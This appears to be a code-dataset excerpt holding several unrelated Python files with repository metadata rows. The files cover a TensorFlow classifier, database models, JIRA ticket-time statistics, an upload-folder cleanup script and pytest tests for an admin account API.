second = [g08.PARTIDOS2[int(pred[i])] for i in range(len(pred))]
pred = prediction.eval(feed_dict={X: x_test}, session=sess)
y_classes = [numpy.argmax(y, axis=None, out=None) for y in y_test]
success = 0
for i in range(len(pred)):
if pred[i] == y_classes[i]:
success += 1
second_acc = (100*success/len(pred))  # accuracy as a percentage
second += [g08.PARTIDOS2[int(pred[i])] for i in range(len(pred))]
second_acc_train = accuracy.eval({X: x_train, y: y_train})
x_train, x_test, y_train, y_test = train_test_split(X3, Y3, test_size = 0.1, random_state=0)
num_features = x_train.shape[1]
learning_rate = 0.01
training_epochs = 1000
tf.reset_default_graph()
# for visualization purposes in TensorBoard we use tf.name_scope
with tf.name_scope("Declaring_placeholder"):
# X is a placeholder for the input features. We will feed data later on
X = tf.placeholder(tf.float32, [None, len(x_train[0])])
# y is a placeholder for the labels. We will feed data later on
y = tf.placeholder(tf.float32, [None, len(y_train[0])])
with tf.name_scope("Declaring_variables"):
# W is our weights. This will update during training time
W = tf.Variable(tf.zeros([len(x_train[0]), len(y_train[0])]))
# b is our bias. This will also update during training time
b = tf.Variable(tf.zeros( [len(y_train[0])] ))
Z = tf.add(tf.matmul(X, W), b)
prediction = tf.nn.softmax(Z)
# Calculate the cost
cost = tf.reduce_mean(tf.nn.sigmoid_cross_entropy_with_logits(logits = Z, labels = y))
# Use Adam as optimization method
optimizer = tf.train.AdamOptimizer(learning_rate).minimize(cost)
init = tf.global_variables_initializer()
cost_history = numpy.empty(shape=[1],dtype=float)
with tf.Session() as sess:
sess.run(init)
for epoch in range(training_epochs):
_, c = sess.run([optimizer, cost], feed_dict={X: x_train, y: y_train})
#print("Epoch:", '%04d' % (epoch+1), "cost=", "{:.9f}".format(c), \ "W=", sess.run(W), "b=", sess.run(b))
cost_history = numpy.append(cost_history, c)
# Calculate the correct predictions
correct_prediction = tf.to_float(tf.greater(prediction, 0.5))
# Calculate accuracy on the test set
accuracy = tf.reduce_mean(tf.to_float(tf.equal(y, correct_prediction)))
prediction=tf.argmax(Z,1)
pred = prediction.eval(feed_dict={X: x_train}, session=sess)
third = [g08.PARTIDOS2[int(pred[i])] for i in range(len(pred))]
pred = prediction.eval(feed_dict={X: x_test}, session=sess)
y_classes = [numpy.argmax(y, axis=None, out=None) for y in y_test]
success = 0
for i in range(len(pred)):
if pred[i] == y_classes[i]:
success += 1
third_acc = (100*success/len(pred))  # accuracy as a percentage
third += [g08.PARTIDOS2[int(pred[i])] for i in range(len(pred))]
third_acc_train = accuracy.eval({X: x_train, y: y_train})
finalDict = {
'res_1': first,
'res_2': second,
'res_3': third,
'err_train': (first_acc+second_acc+third_acc)/3,
'err_test': (first_acc_train+second_acc_train+third_acc_train)/3,
'train_set': [True]*len(X1)+[False]*len(Y1),
}
return finalDict
regression() | 30.189781 | 114 | 0.657398 | 1,274 | 8,272 | 4.11303 | 0.137363 | 0.024046 | 0.018893 | 0.017176 | 0.878244 | 0.866794 | 0.866794 | 0.866794 | 0.866794 | 0.866794 | 0 | 0.024256 | 0.207568 | 8,272 | 274 | 115 | 30.189781 | 0.775133 | 0.194391 | 0 | 0.688889 | 0 | 0 | 0.025633 | 0.009499 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.066667 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
692db7a164ae093b17a134da88dad9cf2e68ec07 | 136 | py | Python | test_demo.py | nsriniva/DS-Unit-3-Sprint-2-SQL-and-Databases | e5a2b5acb6a6b962a7206334f3efb79c1c65f6ed | [
"MIT"
] | null | null | null | test_demo.py | nsriniva/DS-Unit-3-Sprint-2-SQL-and-Databases | e5a2b5acb6a6b962a7206334f3efb79c1c65f6ed | [
"MIT"
] | null | null | null | test_demo.py | nsriniva/DS-Unit-3-Sprint-2-SQL-and-Databases | e5a2b5acb6a6b962a7206334f3efb79c1c65f6ed | [
"MIT"
] | null | null | null | from demo_data import row_count, xy_at_least_5, unique_y
print (f'{row_count = }')
print(f'{xy_at_least_5 = }')
print(f'{unique_y = }') | 27.2 | 56 | 0.713235 | 26 | 136 | 3.307692 | 0.538462 | 0.209302 | 0.209302 | 0.232558 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016667 | 0.117647 | 136 | 5 | 57 | 27.2 | 0.7 | 0 | 0 | 0 | 0 | 0 | 0.328467 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0.75 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 7 |
697208e691ebb9ff70962f6993cec0f9c9b1f3f1 | 1,767 | py | Python | parse/delete_script.py | damiso15/excel_microservice | 4c1b57ad6b5d1afb455d55ea97981b8ecc7c28f6 | [
"MIT"
] | null | null | null | parse/delete_script.py | damiso15/excel_microservice | 4c1b57ad6b5d1afb455d55ea97981b8ecc7c28f6 | [
"MIT"
] | 5 | 2021-03-30T14:07:01.000Z | 2021-09-22T19:30:11.000Z | parse/delete_script.py | damiso15/excel_microservice | 4c1b57ad6b5d1afb455d55ea97981b8ecc7c28f6 | [
"MIT"
] | null | null | null | import time
import os
from datetime import datetime
from excel_parser.settings import BASE_DIR
def clear_upload():
while True:
time_list = []
now = time.mktime(datetime.now().timetuple())
directory = os.path.join(BASE_DIR, 'media/upload')
for file in os.listdir(directory):
file = os.path.join(directory, file)
# get file creation/modification time
file_time = os.path.getmtime(file)
if now - file_time > 10:
os.remove(file)
else:
# add time info to list
time_list.append(file_time)
# after checking all files, take the oldest file's creation time from the list
# if time_list is empty, default the sleep time to 15 seconds; otherwise derive it from the oldest file's age
sleep_time = (now - min(time_list)) if time_list else 15
time.sleep(sleep_time + 5)
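# Usage sketch (commented out; the threading setup below is an assumption,
# not part of this module). Both cleaners loop forever, so they are
# typically started on daemon threads:
#
#   import threading
#   threading.Thread(target=clear_upload, daemon=True).start()
#   threading.Thread(target=clear_download, daemon=True).start()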
def clear_download():
while True:
time_list = []
now = time.mktime(datetime.now().timetuple())
directory = os.path.join(BASE_DIR, 'media/user')
for file in os.listdir(directory):
file = os.path.join(directory, file)
# get file creation/modification time
file_time = os.path.getmtime(file)
if now - file_time > 10:
os.remove(file)
else:
# add time info to list
time_list.append(file_time)
# after checking all files, take the oldest file's creation time from the list
# if time_list is empty, default the sleep time to 15 seconds; otherwise derive it from the oldest file's age
sleep_time = (now - min(time_list)) if time_list else 15
time.sleep(sleep_time + 5)
| 37.595745 | 120 | 0.608942 | 239 | 1,767 | 4.393305 | 0.259414 | 0.07619 | 0.038095 | 0.08 | 0.885714 | 0.885714 | 0.885714 | 0.885714 | 0.885714 | 0.885714 | 0 | 0.013169 | 0.312394 | 1,767 | 46 | 121 | 38.413043 | 0.851029 | 0.269949 | 0 | 0.75 | 0 | 0 | 0.017174 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.125 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d6eb1a30033c7065293e851ce900424a8ae5efdd | 1,945 | py | Python | forest_monitor/models/deter.py | claudiobogossian/forest-monitor | 0df8d05aecb02d3b97e7ce3d763f88dfcd5ea3f3 | [
"MIT"
] | null | null | null | forest_monitor/models/deter.py | claudiobogossian/forest-monitor | 0df8d05aecb02d3b97e7ce3d763f88dfcd5ea3f3 | [
"MIT"
] | null | null | null | forest_monitor/models/deter.py | claudiobogossian/forest-monitor | 0df8d05aecb02d3b97e7ce3d763f88dfcd5ea3f3 | [
"MIT"
] | null | null | null | import datetime
from geoalchemy2 import Geometry
from sqlalchemy import BigInteger, Column, Date, DateTime, Integer, Numeric, String, Text
from forest_monitor.models import BaseModel
class Deter(BaseModel):
__tablename__ = 'deter'
id = Column(Integer, primary_key=True)
geom = Geometry(geometry_type='MULTIPOLYGON', srid=4326, spatial_index=True)
classname = Column(String(254))
quadrant = Column(String(5))
path_row = Column(String(10))
view_date = Column(Date)
sensor = Column(String(10))
satellite = Column(String(13))
areauckm = Column(Numeric)
uc = Column(String(254))
areamunkm = Column(Numeric)
municipali = Column(String(254))
uf = Column(String(2))
scene_id = Column(String(254))
source = Column(String(2))
user_id = Column(String(254))
ncar_ids = Column(Integer)
car_imovel_id = Column(Text(2048))
created_at = Column(Date,
default=datetime.date.today(),
onupdate=datetime.date.today())
image_date = Column(Date)
class MascaraDeter(BaseModel):
__tablename__ = 'mascara_deter'
id = Column(Integer, primary_key=True)
geom = Geometry(geometry_type='MULTIPOLYGON', srid=4326, spatial_index=True)
classname = Column(String(254))
quadrant = Column(String(5))
path_row = Column(String(10))
view_date = Column(Date)
sensor = Column(String(10))
satellite = Column(String(13))
areauckm = Column(Numeric)
uc = Column(String(254))
areamunkm = Column(Numeric)
municipali = Column(String(254))
uf = Column(String(2))
scene_id = Column(String(254))
source = Column(String(2))
user_id = Column(String(254))
ncar_ids = Column(Integer)
car_imovel_id = Column(Text(2048))
created_at = Column(Date,
default=datetime.date.today(),
onupdate=datetime.date.today())
image_date = Column(Date)
| 32.416667 | 89 | 0.661697 | 232 | 1,945 | 5.400862 | 0.275862 | 0.210694 | 0.119713 | 0.05427 | 0.822027 | 0.822027 | 0.822027 | 0.822027 | 0.822027 | 0.822027 | 0 | 0.042848 | 0.220051 | 1,945 | 59 | 90 | 32.966102 | 0.783125 | 0 | 0 | 0.846154 | 0 | 0 | 0.021594 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.923077 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 9 |
ba3842d998555e3bd8dcff0255e76ef944265c17 | 711 | py | Python | cmn/models.py | MartinStevko/matikNoHa | 5e97db097da7e48243eeb13674bf1495fe00f67f | [
"MIT"
] | null | null | null | cmn/models.py | MartinStevko/matikNoHa | 5e97db097da7e48243eeb13674bf1495fe00f67f | [
"MIT"
] | null | null | null | cmn/models.py | MartinStevko/matikNoHa | 5e97db097da7e48243eeb13674bf1495fe00f67f | [
"MIT"
] | null | null | null | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import User
class Post(models.Model):
author = models.ForeignKey(User, on_delete=models.PROTECT, default=1)
obsah = models.TextField()
cas = models.DateTimeField(default=timezone.now)
schvalene = models.BooleanField(default=False)
def __str__(self):
return "Post {}".format(self.id)
class Backup(models.Model):
author = models.ForeignKey(User, on_delete=models.PROTECT, default=1)
obsah = models.TextField()
cas = models.DateTimeField(default=timezone.now)
schvalene = models.BooleanField(default=False)
def __str__(self):
return "Post {}".format(self.id)
| 32.318182 | 73 | 0.722925 | 89 | 711 | 5.662921 | 0.393258 | 0.059524 | 0.06746 | 0.09127 | 0.781746 | 0.781746 | 0.781746 | 0.781746 | 0.781746 | 0.781746 | 0 | 0.00335 | 0.160338 | 711 | 21 | 74 | 33.857143 | 0.840871 | 0 | 0 | 0.705882 | 0 | 0 | 0.019691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0 | 0.176471 | 0.117647 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
ba74ca81b8f949bcb9fe8b08db6e9621abf2bffc | 4,719 | py | Python | calculation.py | capan/jiraExcelReport | 09f457d96ef6aa37030ce6805241a0cdef3c926d | [
"MIT"
] | 2 | 2018-10-11T08:37:51.000Z | 2018-10-31T07:04:58.000Z | calculation.py | capan/jiraExcelReport | 09f457d96ef6aa37030ce6805241a0cdef3c926d | [
"MIT"
] | null | null | null | calculation.py | capan/jiraExcelReport | 09f457d96ef6aa37030ce6805241a0cdef3c926d | [
"MIT"
] | null | null | null | import datetime as d
import numpy as np
ymd_create = []
ymd_resdate = []
delta_t = []
class calculate:
def __init__(self):
self.result = 0
def meantime(self, issueobject):
del ymd_create[:], ymd_resdate[:], delta_t[:]  # reset the shared module-level lists so repeated calls do not accumulate
for i in range(0, len(issueobject)):
ymd_create.append(d.datetime(int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'created'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[1])))
ymd_resdate.append(d.datetime(int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'resolutiondate'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[1])))
delta_t.append((ymd_resdate[i] - ymd_create[i]).days)
self.result = np.mean(np.array(delta_t))
return self.result
def mediantime(self, issueobject):
for i in range(0, len(issueobject)):
ymd_create.append(d.datetime(int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'created'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[1])))
ymd_resdate.append(d.datetime(int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'resolutiondate'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[1])))
delta_t.append((ymd_resdate[i] - ymd_create[i]).days)
self.result = np.median(np.array(delta_t))
return self.result
def variancetime(self, issueobject):
for i in range(0, len(issueobject)):
ymd_create.append(d.datetime(int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'created'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'created'].split('T')[1].split(':')[1])))
ymd_resdate.append(d.datetime(int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[0].split('-')[1]), int(issueobject[i].raw[u'fields']
[u'resolutiondate'].split('T')[0].split('-')[2]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[0]), int(issueobject[i].raw[u'fields'][u'resolutiondate'].split('T')[1].split(':')[1])))
delta_t.append((ymd_resdate[i] - ymd_create[i]).days)
self.result = np.var(np.array(delta_t))
return self.result
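The split-heavy timestamp handling above can also be done in one call with `datetime.strptime`; a minimal standalone sketch, assuming JIRA's usual `%Y-%m-%dT%H:%M:%S.%f%z` timestamp shape (e.g. `"2018-10-11T08:37:51.000+0000"`):

```python
from datetime import datetime

def parse_jira_timestamp(value):
    # One strptime call replaces the nested split('T')/split('-')/split(':')
    # chains, and keeps the timezone offset instead of discarding it.
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%S.%f%z")

def resolution_days(created, resolved):
    # Whole days between creation and resolution, matching the .days
    # arithmetic used by the statistics methods above.
    return (parse_jira_timestamp(resolved) - parse_jira_timestamp(created)).days
```

This is a sketch of an alternative, not the repository's own code; if the JIRA instance emits a different timestamp format, the format string would need adjusting.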
| 107.25 | 428 | 0.457512 | 538 | 4,719 | 3.966543 | 0.079926 | 0.196814 | 0.210872 | 0.253046 | 0.934864 | 0.934864 | 0.934864 | 0.921275 | 0.891284 | 0.891284 | 0 | 0.020228 | 0.329519 | 4,719 | 43 | 429 | 109.744186 | 0.654235 | 0 | 0 | 0.6 | 0 | 0 | 0.11761 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.114286 | false | 0 | 0.057143 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
ba7521cc4e1ce611befabbd7ed069a82d837f5c5 | 587 | py | Python | la_parra/la_parra/web_form_advanced/prueba_1/prueba_1.py | Nirchains/parra | e6da1b393e2377ad6f8c1f3327e18f6f2fd8ba3a | [
"MIT"
] | null | null | null | la_parra/la_parra/web_form_advanced/prueba_1/prueba_1.py | Nirchains/parra | e6da1b393e2377ad6f8c1f3327e18f6f2fd8ba3a | [
"MIT"
] | null | null | null | la_parra/la_parra/web_form_advanced/prueba_1/prueba_1.py | Nirchains/parra | e6da1b393e2377ad6f8c1f3327e18f6f2fd8ba3a | [
"MIT"
] | null | null | null | from __future__ import unicode_literals
import frappe
def get_context(context):
# do your magic here
pass
#def get_context(context):
# if frappe.form_dict.project:
# context.parents = [{'title': frappe.form_dict.project, 'route': '/projects?project='+ frappe.form_dict.project}]
# context.success_url = "/projects?project=" + frappe.form_dict.project
# elif context.doc and context.doc.get('project'):
# context.parents = [{'title': context.doc.project, 'route': '/projects?project='+ context.doc.project}]
# context.success_url = "/projects?project=" + context.doc.project
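The commented-out logic above (breadcrumb parents plus a success URL derived from a project name) can be expressed as a framework-agnostic helper; a hypothetical sketch in which the dict-based context and the `form_project` parameter are assumptions standing in for `frappe.form_dict.project` and `context.doc`:

```python
def build_project_context(context, form_project=None):
    # Mirror the commented-out branches: prefer the project name from the
    # request form, fall back to the bound document's 'project' field.
    project = form_project or (context.get('doc') or {}).get('project')
    if project:
        route = '/projects?project=' + project
        context['parents'] = [{'title': project, 'route': route}]
        context['success_url'] = route
    return context
```

This is illustrative only; the real frappe `get_context` hook mutates a context object rather than a plain dict.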
| 32.611111 | 115 | 0.734242 | 76 | 587 | 5.5 | 0.355263 | 0.200957 | 0.133971 | 0.200957 | 0.473684 | 0.30622 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110733 | 587 | 17 | 116 | 34.529412 | 0.800766 | 0.810903 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0.25 | 0.5 | 0 | 0.75 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 1 | 0 | 0 | 7 |
ba826126daa4a589fc3da5c0063bbadcfceb6411 | 31,521 | py | Python | application/src/pytest/python/modules/user_account/routes_admin_test.py | okebinda/base.api.python | fdf6dc02ab73d588919f38d6017788f7822cfd04 | [
"Apache-2.0"
] | null | null | null | application/src/pytest/python/modules/user_account/routes_admin_test.py | okebinda/base.api.python | fdf6dc02ab73d588919f38d6017788f7822cfd04 | [
"Apache-2.0"
] | 2 | 2021-06-02T03:26:04.000Z | 2021-09-30T03:04:00.000Z | application/src/pytest/python/modules/user_account/routes_admin_test.py | okebinda/base.api.python | fdf6dc02ab73d588919f38d6017788f7822cfd04 | [
"Apache-2.0"
] | null | null | null | from copy import copy
import re
import base64
import pytest
from werkzeug.exceptions import NotFound, Unauthorized
from sqlalchemy.orm.exc import NoResultFound
from fixtures import Fixtures
from app import create_app
from config import Config
from modules.user_account.routes_admin import get_account, put_account, \
put_password
from modules.administrators.model import Administrator, \
AdministratorPasswordHistory
from modules.roles.model import Role
from modules.app_keys.model import AppKey
@pytest.fixture
def app(request):
config = copy(Config)
config.TESTING = True
config.APP_TYPE = 'admin' if 'admin_api' in request.keywords else 'public'
app = create_app(config)
if 'unit' in request.keywords:
yield app
else:
fixtures = Fixtures(app)
fixtures.setup()
yield app
fixtures.teardown()
# UNIT TESTS
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_ok(app, mocker):
expected_status = 200
expected_json = {
'email': None,
'first_name': None,
'id': None,
'joined_at': None,
'last_name': None,
'password_changed_at': None,
'uri': None,
'username': None,
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
result = get_account()
assert result[1] == expected_status
assert result[0].json['user_account'] == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_route_ok(app, mocker, client):
expected_status = 200
# mock db query
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login db query
role2 = Role()
role2.id = 2
role2.name = 'SUPER_ADMIN'
role2.password_reset_days = 365
admin1 = Administrator()
admin1.id = 1
admin1.password = 'admin1pass'
admin1.roles = [role2]
query_mock.return_value \
.filter.return_value \
.first.return_value = admin1
db_mock = mocker.patch('modules.administrators.authentication.db')
db_mock.add.return_value = None
db_mock.commit.return_value = None
# mock user login
auth_mock = mocker.patch(
'modules.administrators.Authentication.is_account_locked')
auth_mock.return_value = False
credentials = base64.b64encode(
'admin1:admin1pass'.encode('ascii')).decode('utf-8')
response = client.get("/user_account?app_key=123",
headers={"Authorization": f"Basic {credentials}"})
assert response.status_code == expected_status
assert 'user_account' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_route_no_app_key(app, client):
expected_status = 401
response = client.get("/user_account")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_route_bad_app_key(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.side_effect = NoResultFound()
response = client.get("/user_account?app_key=BAD_KEY")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_get_account_route_unauthorized(app, mocker, client):
expected_status = 401
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock app key authorization db query
query_mock.return_value \
.filter.return_value \
.one.return_value = AppKey()
# mock user login
auth_mock = mocker.patch('modules.administrators.Authentication')
auth_mock.verify_password.side_effect = Unauthorized()
response = client.get("/user_account?app_key=123")
assert response.status_code == expected_status
assert 'error' in response.json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_profile_ok(app, mocker):
expected_status = 200
expected_m_length = 8
expected_m_id = 1
expected_m_username = "admin1a"
expected_m_email = "admin1a@test.com"
expected_m_first_name = "TommyA"
expected_m_last_name = "LundA"
expected_m_uri = "http://localhost/administrator/1"
expected_m_password_changed_at = None
expected_m_joined_at = None
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': expected_m_username,
'email': expected_m_email,
'first_name': expected_m_first_name,
'last_name': expected_m_last_name,
}
admin1 = Administrator()
admin1.id = 1
admin1.username = 'admin1'
admin1.email = 'admin1@test.com'
admin1.first_name = 'Tommy'
admin1.last_name = 'Lund'
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = admin1
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
db_mock = mocker.patch('modules.user_account.routes_admin.db')
db_mock.commit.return_value = None
result = put_account()
assert result[1] == expected_status
assert 'user_account' in result[0].json
assert len(result[0].json['user_account']) == expected_m_length
assert result[0].json['user_account']['id'] == expected_m_id
assert result[0].json['user_account']['username'] == expected_m_username
assert result[0].json['user_account']['email'] == expected_m_email
assert result[0].json['user_account']['first_name'] == \
expected_m_first_name
assert result[0].json['user_account']['last_name'] == expected_m_last_name
assert result[0].json['user_account']['uri'] == expected_m_uri
assert result[0].json['user_account']['password_changed_at'] == \
expected_m_password_changed_at
assert result[0].json['user_account']['joined_at'] == expected_m_joined_at
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_required_fail(app, mocker):
expected_status = 400
expected_json = {
'error': {
'username': ['Missing data for required field.'],
'email': ['Missing data for required field.'],
'first_name': ['Missing data for required field.'],
'foo': ['Unknown field.'],
'last_name': ['Missing data for required field.'],
}
}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {'foo': "bar"}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_unique_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'username': ['Value must be unique.'],
'email': ['Value must be unique.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'admin2',
'email': 'admin2@test.com',
'first_name': "TommyA",
'last_name': "LundA",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.side_effect = [Administrator(), Administrator()]
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_username_numeric_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'username': ['Value must not be a number.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': '1234',
'email': 'admin1a@test.com',
'first_name': "TommyA",
'last_name': "LundA",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_username_character_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'username': ['Value must contain only alphanumeric characters and the underscore.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'admin 1',
'email': 'admin1a@test.com',
'first_name': "TommyA",
'last_name': "LundA",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_email_format_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'email': ['Not a valid email address.']}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'admin1',
'email': 'admin1atest.com',
'first_name': "TommyA",
'last_name': "LundA",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_min_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'first_name': ['Value must be between 1 and 40 characters long.'],
'last_name': ['Value must be between 2 and 40 characters long.'],
'username': ['Value must be between 2 and 40 characters long.'],
}}
request_mock = mocker.patch('modules.user_account.routes_admin.request')
request_mock.json = {
'username': 'a',
'email': 'admin1a@test.com',
'first_name': "",
'last_name': "L",
}
g_mock = mocker.patch('modules.user_account.routes_admin.g')
g_mock.user = Administrator()
query_mock = mocker.patch('flask_sqlalchemy._QueryProperty.__get__')
# mock unique(), unique_email() validation
query_mock.return_value \
.filter.return_value \
.first.return_value = None
result = put_account()
assert result[1] == expected_status
assert result[0].json == expected_json
@pytest.mark.unit
@pytest.mark.admin_api
def test_put_account_max_fail(app, mocker):
expected_status = 400
expected_json = {'error': {
'first_name': ['Value must be between 1 and 40 characters long.'],
'last_name': ['Value must be between 2 and 40 characters long.'],
'username': ['Value must be between 2 and 40 characters long.'],
}}
